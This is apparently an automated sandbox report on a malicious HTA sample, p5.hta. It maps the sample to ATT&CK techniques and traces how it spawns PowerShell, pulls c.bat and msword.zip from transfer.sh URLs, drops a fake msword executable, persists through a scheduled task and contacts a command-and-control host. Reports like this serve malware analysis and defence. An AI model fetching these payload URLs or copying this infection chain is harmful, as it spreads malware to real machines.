File and Directory Discovery
Remote Services11
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Command and Scripting Interpreter
1
DLL Side-Loading
11
Process Injection
11
Deobfuscate/Decode Files or Information
LSASS Memory25
System Information Discovery
Remote Desktop Protocol1
Email Collection
11
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Scheduled Task/Job
1
Scheduled Task/Job
1
Scheduled Task/Job
31
Obfuscated Files or Information
Security Account Manager241
Security Software Discovery
SMB/Windows Admin Shares11
Input Capture
1
Non-Standard Port
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts3
PowerShell
Login HookLogin Hook2
Software Packing
NTDS1
Process Discovery
Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets141
Virtualization/Sandbox Evasion
SSHKeylogging13
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts111
Masquerading
Cached Domain Credentials1
Application Window Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
Virtualization/Sandbox Evasion
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
Process Injection
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1392585 Sample: p5.hta Startdate: 15/02/2024 Architecture: WINDOWS Score: 100 75 transfer.sh 2->75 77 me-work.com 2->77 85 Malicious sample detected (through community Yara rule) 2->85 87 Antivirus detection for URL or domain 2->87 89 Antivirus / Scanner detection for submitted sample 2->89 91 11 other signatures 2->91 11 mshta.exe 1 2->11         started        14 msword.exe 2->14         started        16 svchost.exe 1 1 2->16         started        signatures3 process4 dnsIp5 99 Suspicious powershell command line found 11->99 19 powershell.exe 15 17 11->19         started        101 Multi AV Scanner detection for dropped file 14->101 103 Machine Learning detection for dropped file 14->103 105 Potentially malicious time measurement code found 14->105 73 127.0.0.1 unknown unknown 16->73 signatures6 process7 dnsIp8 79 transfer.sh 144.76.136.153, 443, 49729, 49730 HETZNER-ASDE Germany 19->79 63 C:\Users\user\AppData\Roaming\c.bat, DOS 19->63 dropped 93 Drops PE files with a suspicious file extension 19->93 95 Powershell drops PE file 19->95 24 cmd.exe 3 2 19->24         started        27 conhost.exe 19->27         started        file9 signatures10 process11 signatures12 97 Suspicious powershell command line found 24->97 29 msword.com 24->29         started        34 powershell.exe 16 24->34         started        36 powershell.exe 15 24->36         started        38 3 other processes 24->38 process13 dnsIp14 83 me-work.com 45.88.186.197, 49750, 7008 ANONYMIZEEpikNetworkCH Netherlands 29->83 65 C:\Users\user\AppData\Roaming\msword.exe, PE32+ 29->65 dropped 107 Multi AV Scanner detection for dropped file 29->107 109 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 29->109 111 Machine Learning detection for dropped file 29->111 113 6 other signatures 29->113 40 powershell.exe 29->40         started        42 powershell.exe 29->42         started        44 powershell.exe 29->44         started        48 2 other processes 29->48 67 C:\Users\user\AppData\Local\Temp\W2.pdf, PDF 34->67 dropped 69 C:\Users\user\AppData\Local\Temp\msword.zip, Zip 36->69 dropped 71 C:\Users\user\AppData\Local\...\msword.com, PE32+ 38->71 dropped 46 AcroCEF.exe 105 38->46         started        file15 signatures16 process17 process18 50 conhost.exe 40->50         started        52 conhost.exe 42->52         started        54 conhost.exe 44->54         started        56 AcroCEF.exe 46->56         started        59 conhost.exe 48->59         started        61 conhost.exe 48->61         started        dnsIp19 81 23.46.240.131, 443, 49744 AKAMAI-ASUS United States 56->81

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
p5.hta39%ReversingLabsDocument-HTML.Trojan.Valyria
p5.hta40%VirustotalBrowse
p5.hta100%AviraVBS/Dldr.Agent.VPLT
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\msword.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\msword\msword.com100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\msword\msword.com26%VirustotalBrowse
C:\Users\user\AppData\Roaming\msword.exe26%VirustotalBrowse
No Antivirus matches
SourceDetectionScannerLabelLink
me-work.com2%VirustotalBrowse
SourceDetectionScannerLabelLink
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
https://go.micro0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
http://crl.ver)0%Avira URL Cloudsafe
http://www.t.com00%Avira URL Cloudsafe
https://go.microP0%Avira URL Cloudsafe
http://crl.microsoftK0%Avira URL Cloudsafe
https://go.microPackageManagementp0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
me-work.com
45.88.186.197
truefalseunknown
transfer.sh
144.76.136.153
truefalse
    high
    NameMaliciousAntivirus DetectionReputation
    https://transfer.sh/get/fHMB2lI9W3/W2.pdffalse
      high
      https://transfer.sh/get/YqLLdAKXyI/c.batfalse
        high
        https://transfer.sh/get/WD631pf02G/msword.zipfalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          https://transfer.sh/get/WD631pf02G/msword.zipurl2=powershell.exe, 00000015.00000002.2212510245.000001D17EAF5000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            https://transfer.sh/get/WD631pf02G/msword.zipurl2=https://transcmd.exe, 00000003.00000002.1982197807.0000000002DFD000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              https://contoso.com/Licensepowershell.exe, 00000019.00000002.2600414376.000002BB5DB63000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://transfer.sh/get/WD631pf02G/msword.zipurl2=https://transfer.sh/get/fHMB2lI9W3/W2.pdfmsword.com, 00000011.00000002.2876723368.000002177B296000.00000004.00000020.00020000.00000000.sdmp, msword.com, 00000011.00000002.2876723368.000002177B210000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2107481179.000001D1647F2000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://transfer.sh/get/WD631pf02G/msword.zipPmsword.com, 00000011.00000002.2870305669.000002173B35C000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://transfer.sh/get/WD631pf02G/msworcmd.exe, 00000003.00000002.1982197807.0000000002DFD000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000006.00000003.1676975989.0000019D43EA3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1676975989.0000019D43EE8000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.drfalse
                      high
                      https://transfer.sh/getAwpowershell.exe, 00000012.00000002.2084084086.00000277E2E3A000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://g.live.com/odclientsettings/Prod.C:svchost.exe, 00000006.00000003.1676975989.0000019D43F1A000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.drfalse
                          high
                          https://transfer.sh/get/fHMB2lI9W3/W2.pdfUSERDOMAIN=MQAWXUYUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAMmsword.com, 00000011.00000002.2876723368.000002177B210000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://g.live.com/odclientsettings/ProdV2svchost.exe, 00000006.00000003.1676975989.0000019D43EC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.drfalse
                              high
                              https://go.microPackageManagementppowershell.exe, 00000012.00000002.2082244736.00000277E2CFD000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://transfer.sh/get/WD631pf02G/msword.zipf:powershell.exe, 00000017.00000002.2370326584.00000209F2DF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://www.t.com0powershell.exe, 00000019.00000002.2630516536.000002BB66230000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://contoso.com/powershell.exe, 00000019.00000002.2600414376.000002BB5DB63000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1667721029.000000000603D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2073502677.00000277DA4F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2195135185.000001D176238000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2327399027.0000020990074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2600414376.000002BB5DB63000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://transfer.sh/get/WD631pf02G/msword.zip2msword.com, 00000011.00000002.2870305669.000002173B3C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://transfer.sh/get/WD631pf02G/msword.zip-powershell.exe, 00000019.00000002.2422417906.000002BB4C0A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1664032088.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, msword.com, 00000011.00000002.2874555447.0000021762A61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2047498345.00000277CA481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2109313918.000001D1661C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2238928330.0000020980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2426391185.000002BB4DAF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 00000006.00000003.1676975989.0000019D43EC2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.drfalse
                                          high
                                          https://transfer.sh/get/fHMB2lI9W3/W2.pdfUSE.cmd.exe, 00000003.00000002.1982197807.0000000002DFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://transfer.sh/get/WD631pf02G/msword.zipurl2=httpspowershell.exe, 00000012.00000002.2047287909.00000277C8CB5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2109154502.000001D164A15000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2373840901.00000209F30E5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2425477490.000002BB4C1F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://transfer.sh/get/WD631pf02G/msword.zipurl2=https://transfer.sh/get/fHMB2lI9W3/W2.pdfUSERDOMAImsword.com, 00000011.00000002.2876607412.000002177AB80000.00000004.00000020.00020000.00000000.sdmp, msword.com, 00000011.00000003.1986580910.000002173B410000.00000004.00000020.00020000.00000000.sdmp, msword.com, 00000011.00000002.2876723368.000002177B210000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2047287909.00000277C8CB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2081259164.00000277E297C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2083126951.00000277E2D99000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2047287909.00000277C8CB5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2047454393.00000277CA470000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2207869582.000001D17E7FA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2109002574.000001D1649C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2212510245.000001D17EAB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2109154502.000001D164A15000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2109154502.000001D164A10000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2374492940.00000209F48F0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2378905432.00000209F4DCF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2373840901.00000209F30E5000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2373840901.00000209F30E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2381867811.00000209F5052000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2384381218.00000209F50A4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2627371615.000002BB6603A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2425477490.000002BB4C1F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://go.microPpowershell.exe, 00000012.00000002.2082244736.00000277E2CFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1667721029.000000000603D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2073502677.00000277DA4F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2195135185.000001D176238000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2327399027.0000020990074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2600414376.000002BB5DB63000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://transfer.sh/get/fHMB2lI9W3/W2.pdfGpowershell.exe, 00000015.00000002.2107481179.000001D1647F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000019.00000002.2426391185.000002BB4DD17000.00000004.00000800.00020000.00000000.sdmptrue
                                                    • URL Reputation: malware
                                                    unknown
                                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000012.00000002.2047498345.00000277CA721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2109313918.000001D1663E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2238928330.0000020980227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2426391185.000002BB4DD17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000019.00000002.2426391185.000002BB4DD17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://transfer.sh/get/fHMB2lI9W3/W2.pdfLpowershell.exe, 00000012.00000002.2046703762.00000277C8A32000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://go.micropowershell.exe, 00000001.00000002.1664032088.00000000052FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2047498345.00000277CC09E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2047498345.00000277CBDDC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2109313918.000001D167B15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2109313918.000001D167DDA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2109313918.000001D167CB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2238928330.0000020981AFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2238928330.0000020981B7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2238928330.0000020981959000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2426391185.000002BB4F5ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2426391185.000002BB4F66C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2426391185.000002BB4F448000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://transfer.sh/powershell.exe, 00000019.00000002.2632983547.000002BB66326000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://contoso.com/Iconpowershell.exe, 00000019.00000002.2600414376.000002BB5DB63000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://transfer.sh/get/fHMB2lI9W3/W2.pdfNmsword.com, 00000011.00000002.2870305669.000002173B3C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              http://crl.ver)svchost.exe, 00000006.00000002.2872187670.0000019D43C8F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              low
                                                              https://transfer.shpowershell.exe, 00000001.00000002.1664032088.0000000005127000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1664032088.00000000052FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://transfer.sh/get/fHMB2lI9W3/W2.pdf3powershell.exe, 00000015.00000002.2107481179.000001D1647F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://aka.ms/pscore6lBsqpowershell.exe, 00000001.00000002.1664032088.0000000004FD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://github.com/Pester/Pesterpowershell.exe, 00000019.00000002.2426391185.000002BB4DD17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://transfer.sh/get/fHMB2lI9W3/W2.pdfUSERDOMAIN_wJPQpowershell.exe, 00000012.00000002.2084084086.00000277E2E3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://transfer.shpowershell.exe, 00000001.00000002.1664032088.000000000563F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://transfer.sh/get/fHMB2lI9W3/W2.pdf(msword.com, 00000011.00000002.2870305669.000002173B35C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 00000006.00000003.1676975989.0000019D43EC2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000012.00000002.2047498345.00000277CA721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2109313918.000001D1663E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2238928330.0000020980227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2426391185.000002BB4DD17000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://aka.ms/pscore68powershell.exe, 00000012.00000002.2047498345.00000277CA481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2109313918.000001D1661C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2238928330.0000020980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2426391185.000002BB4DAF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://crl.microsoftKpowershell.exe, 00000001.00000002.1662915027.0000000003659000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://transfer.sh/get/WD631pf02G/msword.zipurl2=https://transfer.sh/get/fHMB2lI9W3/W2.pdfkernel32.msword.com, 00000011.00000002.2868653733.000000C000012000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://transfer.sh/get/WD631pf02G/msword.zipwpowershell.exe, 00000015.00000002.2107481179.000001D1647F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://transfer.sh/get/WD631pf02G/msword.zipupowershell.exe, 00000015.00000002.2211623578.000001D17EA54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs
                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        144.76.136.153
                                                                                        transfer.shGermany
                                                                                        24940HETZNER-ASDEfalse
                                                                                        23.46.240.131
                                                                                        unknownUnited States
                                                                                        16625AKAMAI-ASUSfalse
                                                                                        45.88.186.197
                                                                                        me-work.comNetherlands
                                                                                        34962ANONYMIZEEpikNetworkCHfalse
                                                                                        IP
                                                                                        127.0.0.1
                                                                                        Joe Sandbox version:40.0.0 Tourmaline
                                                                                        Analysis ID:1392585
                                                                                        Start date and time:2024-02-15 06:27:05 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 10m 1s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:31
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:p5.hta
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.spyw.evad.winHTA@49/77@2/4
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 28.6%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 99%
                                                                                        • Number of executed functions: 77
                                                                                        • Number of non-executed functions: 15
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .hta
                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 23.220.189.216, 23.63.204.182, 18.207.85.246, 107.22.247.231, 54.144.73.197, 34.193.227.236, 23.62.230.70, 23.62.230.92, 162.159.61.3, 172.64.41.3, 23.34.82.7, 23.34.82.6, 104.84.231.73, 104.84.231.81, 23.15.197.249, 23.15.197.193
                                                                                        • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, slscr.update.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, geo2.adobe.com
                                                                                        • Execution Graph export aborted for target powershell.exe, PID 5664 because it is empty
                                                                                        • Execution Graph export aborted for target powershell.exe, PID 6268 because it is empty
                                                                                        • Execution Graph export aborted for target powershell.exe, PID 7384 because it is empty
                                                                                        • Execution Graph export aborted for target powershell.exe, PID 8056 because it is empty
                                                                                        • Execution Graph export aborted for target powershell.exe, PID 8680 because it is empty
                                                                                        • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                        • Report size getting too big, too many NtCreateFile calls found.
                                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                        TimeTypeDescription
                                                                                        05:29:53Task SchedulerRun new task: msword path: C:\Users\user\AppData\Roaming\msword.exe
                                                                                        06:27:54API Interceptor158x Sleep call for process: powershell.exe modified
                                                                                        06:27:57API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                        06:29:51API Interceptor3x Sleep call for process: msword.com modified
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        144.76.136.153SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeGet hashmaliciousUnknownBrowse
                                                                                        • transfer.sh/get/1h9hjM/LoWin64.exe
                                                                                        SecuriteInfo.com.Win64.Trojan-gen.31951.26059.exeGet hashmaliciousUnknownBrowse
                                                                                        • transfer.sh/get/1h9hjM/LoWin64.exe
                                                                                        http://144.76.136.153Get hashmaliciousUnknownBrowse
                                                                                        • 144.76.136.153:443/
                                                                                        file.exeGet hashmaliciousRedLineBrowse
                                                                                        • transfer.sh/get/wADq8n/434123433142.exe
                                                                                        file.exeGet hashmaliciousRedLineBrowse
                                                                                        • transfer.sh/get/yAEPpl/gggge.exe
                                                                                        1JCAVkYU3U.exeGet hashmaliciousRedLineBrowse
                                                                                        • transfer.sh/get/yAEPpl/gggge.exe
                                                                                        file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                        • transfer.sh/get/yAEPpl/gggge.exe
                                                                                        PURCHASE ORDER & SAMPLE IMAGE.xlsxGet hashmaliciousUnknownBrowse
                                                                                        • transfer.sh/get/I9BcJI/maxdyn2.1.exe
                                                                                        RFQ-BT5004423.docGet hashmaliciousAveMaria, UACMeBrowse
                                                                                        • transfer.sh/get/mGCQGV/gstallabt4.2.exe
                                                                                        SecuriteInfo.com.Exploit.CVE-2018-0798.4.16955.24932.rtfGet hashmaliciousAveMaria, UACMeBrowse
                                                                                        • transfer.sh/get/8LtEmv/mwele.exe
                                                                                        23.46.240.131doxx.lnkGet hashmaliciousPureCrypter, PureLog Stealer, RedLineBrowse
                                                                                          PO008475638473.xlsGet hashmaliciousUnknownBrowse
                                                                                            https://frenchinstitute-my.sharepoint.com/:f:/g/personal/claire_goller_institut-francais_org_uk/EufbV0KyKXlHkna5NPTykO4BcMWBnoPWI_IrwXx-Bdwjjw?e=uKXt6RGet hashmaliciousUnknownBrowse
                                                                                              account_pdf.zipGet hashmaliciousSugarGhostBrowse
                                                                                                DHL_DOC19001-3671.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                  https://listerbeaupre-my.sharepoint.com/:b:/g/personal/amy_listerlawyers_com/EbhWOKfE49REtrfKirj6ZQUB5fSlwdbL6JjW_pn7rshZ2w?e=4%3a3hIjCn&at=9Get hashmaliciousUnknownBrowse
                                                                                                    Air-Vibes-Wireless-Earbuds-Instructions.7zGet hashmaliciousJupyterBrowse
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      transfer.shDEKONT-14-02-2024-98766789098765456789876567898765678.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 144.76.136.153
                                                                                                      DEKONT-14-02-2024-98766789098765456789876567898765678.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 144.76.136.153
                                                                                                      vegpadg6oW.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, PureLog Stealer, RedLine, SmokeLoaderBrowse
                                                                                                      • 144.76.136.153
                                                                                                      69Rgjcm24m.exeGet hashmaliciousLummaC, Babuk, Djvu, PureLog Stealer, RedLine, SmokeLoader, StealcBrowse
                                                                                                      • 144.76.136.153
                                                                                                      oowDCOLXv5.exeGet hashmaliciousLummaC, Babuk, Djvu, RedLine, SmokeLoader, Stealc, VidarBrowse
                                                                                                      • 144.76.136.153
                                                                                                      SWIFT COPY.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 144.76.136.153
                                                                                                      IGLIR00138528-pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 144.76.136.153
                                                                                                      PRICE INQUIRY.exeGet hashmaliciousAgentTesla, Discord Token StealerBrowse
                                                                                                      • 144.76.136.153
                                                                                                      Sketch Itinerary_Bhutan 2024.exeGet hashmaliciousAgentTesla, Discord Token StealerBrowse
                                                                                                      • 144.76.136.153
                                                                                                      MKi988.exeGet hashmaliciousAgentTesla, Discord Token StealerBrowse
                                                                                                      • 144.76.136.153
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      HETZNER-ASDE50AsBVCga6.exeGet hashmaliciousRedLineBrowse
                                                                                                      • 49.13.89.187
                                                                                                      50AsBVCga6.exeGet hashmaliciousRedLineBrowse
                                                                                                      • 49.13.89.187
